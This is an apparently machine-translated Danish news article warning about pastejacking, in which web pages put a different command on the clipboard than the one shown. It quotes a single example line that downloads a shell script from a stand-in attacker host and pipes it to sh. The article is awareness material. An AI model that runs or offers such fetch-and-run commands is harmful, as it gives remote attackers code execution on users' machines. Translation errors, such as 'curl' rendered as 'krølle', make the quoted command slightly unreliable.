- Vi kopierer og indsætter alle fra internettet på daglig basis uden egentlig at kende risiciene.
- En sikkerhedsekspert tog sig tid til at vise alle et worst-case scenario, når de gjorde dette.
- At indsætte kommandoer, du har fået fra internettet, i din terminal er en hurtig måde at blive hacket på
- De kommandoer, du troede, du indsatte i din terminal, er faktisk ondsindede koder.
Det er rigtigt, at vi lever i en æra, hvor hastighed er alt, og at få hurtige resultater er alt, der betyder noget. Men de færreste stopper op et sekund og tænker på konsekvenserne.
På daglig basis udfører millioner af programmører, administratorer og sikkerhedsforskere simple opgaver som at kopiere og indsætte kommandoer fra websider direkte ind i konsoller på deres pc'er.
Selvom mange ikke engang tænker over dette, er implikationerne større og mere farlige, end du måske tror i starten, især hvis du gemmer følsomme eller værdifulde data.
En velkendt sikkerhedsekspert tog sig tid til at dele hvad der rent faktisk kunne ske hvis du kopierer+indsætter indhold fra websider.
Copy+Paste er en nem måde at blive hacket på
Gabriel Friedlander, som er grundlæggeren af sikkerhedsbevidsthedstræningsplatformen Wizer, trak coveret af en ordning, der får dig til at tænke to gange, før du kopierer og indsætter kommandoer fra websider.
Kopiering og indsættelse af indhold fra internettet er blevet så almindeligt i dag, at ingen tænker over det.
Friedlander advarer dog om, at nogle websider er mere bedrageriske, end man umiddelbart kunne være klar over, og det, du tror, du har kopieret fra dem, er meget forskelligt fra, hvad du faktisk gjorde.
Og det værste ved alt dette er, at uden den nødvendige viden eller vejledning indser ofrene først deres fejl, efter at de har indsat teksten, hvorefter det måske allerede er for sent.
Sikkerhedsanalytikeren udtænkte også en lille test til sine bloglæsere, bare så folk faktisk kan forstå, hvor nemt det er for dig uvilligt at åbne døren for cyberkriminelle.
Han gav en kommando, der er beregnet til at blive kopieret, men den pågældende sandhed afsløres først, når du indsætter teksten og ser, hvad du faktisk introducerede i din opsætning.
Efter at have kopieret kommandoen vist i skærmbilledet ovenfor, vil resultatet af at indsætte det chokere dig, da det er langt fra, hvad du troede, du duplikerede.
krølle http://attacker-domain: 8000/shell.sh | shUdover den helt anderledes kommando, der er til stede på dit udklipsholder, er den nye linje (eller retur-tegn) ved slutningen af det betyder, at ovenstående eksempel vil køre, så snart det er indsat direkte i en Linux terminal.
Så du må hellere være mere opmærksom på, hvad der rent faktisk sker, og behandle dette som en alvorlig sikkerhedsrisiko. Vi siger ikke, at alle websteder skjuler ondsindet indhold, men det kan betale sig at tage dette i betragtning.
Er du nogensinde blevet hacket fra at indsætte risikable kommandoer i din terminal? Del din oplevelse med os i kommentarfeltet nedenfor.
![5+ bedste software til indtrængningsdetektering [IDS Tools]](/f/97253b0fd53b21b06be0b802ca6d5ab6.jpg?width=300&height=460)